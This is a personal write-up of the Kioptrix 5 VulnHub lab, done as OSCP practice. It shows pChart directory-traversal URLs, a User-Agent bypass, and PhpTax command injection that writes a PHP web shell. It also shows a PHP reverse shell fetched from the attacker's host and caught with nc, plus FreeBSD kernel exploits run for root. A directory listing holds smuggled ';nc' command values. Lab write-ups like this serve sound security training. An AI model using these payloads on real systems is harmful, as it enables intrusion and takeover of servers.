Kioptrix 5 Write-Up
To prepare for the OSCP[1] I'm planning to do a whole bunch of VulnHub VMs and other challenges. Doing these VMs and writing them up should give me a good amount of practice before I start the actual PWK[1] course.
Kioptrix 5
The Kioptrix series consists of several beginner boot2root VMs, each with multiple ways to gain a root shell[2].
Setup
I’m using VMware with two VMs: Kali 2017.1 and Kioptrix 5.
Scanning & Enumeration
After finding the IP of the Kioptrix VM, the usual Nmap scan gives a quick overview of what is running on it (this is the default top-1000-port scan, so anything on an unusual port would not show up here). One thing that immediately catches the eye is that the service banners say FreeBSD - I'm curious how this will compare to a normal Linux install.
root@vm-kali:~# nmap -T4 -sV 172.16.45.137
Starting Nmap 7.40 ( https://nmap.org ) at 2017-09-09 16:46 MDT
Nmap scan report for 172.16.45.137
Host is up (0.00020s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:9F:53:4E (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.00 seconds
While the site on port 8080 cannot be accessed yet, the HTML source of the site on port 80 contains a commented-out meta refresh that points to a reachable URL:
<!-- <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php"> -->
Web Vulnerabilities
According to searchsploit, pChart 2.1.3 has multiple known vulnerabilities; one of them is a directory traversal in the Script parameter of index.php that is easy to abuse[3].
root@vm-kali:~# searchsploit pchart
------------------------------------------------ ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
------------------------------------------------ ----------------------------------
pChart 2.1.3 - Multiple Vulnerabilities | php/webapps/31173.txt
------------------------------------------------ ----------------------------------
This allows reading any file the web server user can access, although most of them aren't that interesting:
index.php?Action=View&Script=/../../../../../etc/rc.conf
hostname="kioptrix2014"
ifconfig_em0="DHCP"
sshd_enable="NO"
# Set dumpdev to "AUTO" to enable crash dumps, "NO" to disable
dumpdev="NO"
apache22_enable="YES"
mysql_enable="YES"
firewall_enable="YES"
firewall_script="/etc/ipfw.rules"
ossechids_enable="YES"
rc_debug="NO"
monitor_enable="YES"
index.php?Action=View&Script=/../../../../../etc/ipfw.rules
#!/bin/sh
ipfw -q -f flush
cmd="ipfw -a add"
pif="em0"
--snip--
After some research on how file locations differ from a Linux install (software installed from ports lives under /usr/local on FreeBSD, so its configuration is under /usr/local/etc rather than /etc), and some trial and error, the Apache config file paved the way to the next step:
index.php?Action=View&Script=/../../../../../usr/local/etc/apache22/httpd.conf
--snip--
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
--snip--
So in order to access the site on port 8080, the User-Agent header has to start with Mozilla/4.0: the SetEnvIf regex is anchored only at the beginning, so any user agent that begins with that string is let through, while modern browsers (Mozilla/5.0) and curl's default agent are denied. Luckily there are plenty of browser plugins that let you change your user agent, and curl's -A option does the same. Doing this gives access to a phptax installation.
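As an added example (not part of the original write-up), the following script builds the pChart traversal requests for the FreeBSD-specific files discussed above, and emulates the SetEnvIf rule so it is clear which User-Agent strings get past the port 8080 gate. TARGET is a placeholder for the VM's address; the file list and the Linux counterparts in the comments are mine, not the page's.

```shell
#!/bin/sh
# Added example, not part of the original write-up. Builds the pChart
# traversal requests for FreeBSD-specific files and emulates the SetEnvIf
# rule that gates port 8080. TARGET is a placeholder for the VM's address.
TARGET="${TARGET:-172.16.45.137}"

# Build the traversal URL the write-up uses. pChart hands the Script value
# to a file read, so "/../../../../.." climbs to the root and the absolute
# path is appended as-is (these paths need no percent-encoding).
pchart_url() {
  printf 'http://%s/pChart2.1.3/index.php?Action=View&Script=/../../../../..%s\n' "$TARGET" "$1"
}

# Files worth reading on a FreeBSD target (list chosen for this example).
# Ports-installed software lives under /usr/local, so the Apache and PHP
# configs are not where a Linux habit would look for them:
#   /etc/rc.conf                       -> which services start at boot
#   /etc/ipfw.rules                    -> firewall script named in rc.conf
#   /usr/local/etc/apache22/httpd.conf -> Linux: /etc/apache2/apache2.conf
#   /usr/local/etc/php.ini             -> Linux: /etc/php/*/apache2/php.ini
FREEBSD_FILES='
/etc/rc.conf
/etc/passwd
/etc/ipfw.rules
/usr/local/etc/apache22/httpd.conf
/usr/local/etc/php.ini
'

dump_files() {
  for f in $FREEBSD_FILES; do
    printf '### %s\n' "$f"
    # index.php returns HTML; strip the tags so the file reads in a terminal.
    curl -s "$(pchart_url "$f")" | sed 's/<[^>]*>//g'
  done
}

# Emulate `SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser`. The regex is
# anchored only at the start and '.' matches any character, so this is a
# prefix test, not a whole-string match. expr's ':' anchors at the start
# just like the Apache rule; the leading 'x' stops expr from treating a UA
# that starts with an operator character as an expression.
ua_allowed() {
  expr "x$1" : 'xMozilla/4.0' >/dev/null
}

# Compare the status code on :8080 with curl's default UA and with one that
# satisfies the rule.
probe_8080() {
  printf 'curl default UA: HTTP %s\n' \
    "$(curl -s -o /dev/null -w '%{http_code}' "http://$TARGET:8080/")"
  printf 'Mozilla/4.0 UA:  HTTP %s\n' \
    "$(curl -s -o /dev/null -w '%{http_code}' -A 'Mozilla/4.0' "http://$TARGET:8080/")"
}

# Dry run: print the URLs. Set RUN_AGAINST_TARGET=1 to actually send requests.
for f in $FREEBSD_FILES; do pchart_url "$f"; done
if [ -n "${RUN_AGAINST_TARGET:-}" ]; then
  dump_files
  probe_8080
fi
```

Because the rule is a prefix match, a User-Agent such as `Mozilla/4.0 (compatible; MSIE 6.0)` is accepted, whereas a current Firefox string starting with `Mozilla/5.0`, or one with a leading space, is not.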
Basic Shell
One directory on the phptax site was especially interesting: its listing already contained the leftovers of earlier attempts to get a shell, file names with shell commands spliced in after a semicolon, which is a strong hint that some parameter ends up on a command line unescaped (the listing may include some of my own attempts as well):
http://172.16.45.137:8080/phptax/data/pdf/
• 1040d-pg2.png
• 1040d-pg2.png;ls;
• 1040d-pg2.png;nc -192.168.1.191 4444;
• 1040d-pg2.png;nc -l -p4444;
• 1040d-pg2.png;nc -l 4444;
• 1040d-pg2.png;nc -lvp 4444;
• 1040d1-pg2.png
• 1040d1-pg2.png
• 1040d1-pg2.png;cat shell.txt > shell.php;
• 1040d1-pg2.png;id > bla;
• 1040d1-pg2.png;mv shell.php shell.txt;
• 1040d1-pg2.png;mv shell.txt shell.php;
• 1040d1-pg2.png;mv shell.txt.shell.php;
• 1040d1-pg2.png;nc -p 4444 > bla;
• 1040d1-pg2.png;nc 192.168.1.191 4444;
• 1040d1-pg2.png;nc 192.168.1.191 4444> bla;
• 1040d1-pg2.png;nc > bla;
• 1040d1-pg2.png;php shell.txt;
• 1040d1-pg2.png;ping 192.168.1.191 > bla;
• 1040d1-pg2.png;pwd > bla;
• 1040d1-pg2.png;rm shell.txt;
• 1040d1-pg2.png;touch bla;
• 1040d1-pg2.png;touch hello.txt;
• 1040d1-pg2.png;which fetch -h > bla;
• 1040d1-pg2.png;which nc > bla;
• 1040d1-pg2.png;which php > bla;
• 1040d1-pg2.png;which wget -h > bla;
• 1040d1-pg2.png;which wget > bla;
• 1040d1-pg2.png;whoami;
• 1040d1-pg2;mv shell.txt shell.php;
Checking searchsploit again shows that PhpTax 0.8 has a known remote code execution issue through the pfilez parameter[4]:
root@vm-kali:~# searchsploit phptax
------------------------------------------------ ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
------------------------------------------------ ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Inje | php/webapps/21833.rb
PhpTax 0.8 - File Manipulation (newvalue) / Rem | php/webapps/25849.txt
phptax 0.8 - Remote Code Execution | php/webapps/21665.txt
------------------------------------------------ ----------------------------------
After a bit of fiddling, the pfilez parameter can be used to write a one-line PHP shell into the phptax directory. The injected text is run by /bin/sh on the target, so the \$ and \" escapes are there for the shell's double-quoted echo, and what ends up in shell.php is a plain system($_GET["c"]) call:
index.php?pfilez=1040d1-pg2.tob;echo "<?php system(\$_GET[\"c\"]); ?>" > shell.php;&pdf=make
view-source:http://172.16.45.137:8080/phptax/shell.php?c=ls
--snip--
Such a simple shell is fine for basic things, but a proper reverse shell is better. This can be achieved by transferring a PHP reverse shell[5] from the Kali machine to the target with Python's SimpleHTTPServer on one side and FreeBSD's fetch on the other. Note that fetch stores the download under its remote file name, so this overwrites the one-liner shell.php; requesting shell.php afterwards executes the reverse shell, which connects back to the nc listener:
view-source:http://172.16.45.137:8080/phptax/shell.php?c=fetch%20http://172.16.45.130:8000/shell.php
root@kali:~/Documents/labs/kioptrix5# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
172.16.45.137 - - [14/Sep/2017 21:53:22] "GET /shell.php HTTP/1.1" 200 -
root@kali:~/Documents/labs/kioptrix5# nc -nvlp 22446
listening on [any] 22446 ...
connect to [172.16.45.130] from (UNKNOWN) [172.16.45.137] 56522
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
3:15PM up 9 mins, 0 users, load averages: 0.00, 0.04, 0.04
USER TTY FROM LOGIN@ IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$
Privilege Escalation
GCC is installed, and finding the privilege escalation was quite easy by using searchsploit and looking for FreeBSD 9.0 - there were at least two different exploits that worked[6][7]. I transferred the code from the Kali machine to the target with the Python SimpleHTTPServer.
$ fetch http://172.16.45.130:8000/28718.c
28718.c 5563 B 32 MBps
$ gcc -o 28718 28718.c
28718.c:178:2: warning: no newline at end of file
$ ./28718
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)
$ fetch http://172.16.45.130:8000/26368.c
26368.c 2213 B 14 MBps
$ gcc -o 26368 26368.c
26368.c:89:2: warning: no newline at end of file
$ ./26368
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
Additional Notes / Lessons Learned
I really enjoyed that this VM was based on FreeBSD and I have to say that I really enjoyed working through the Kioptrix series.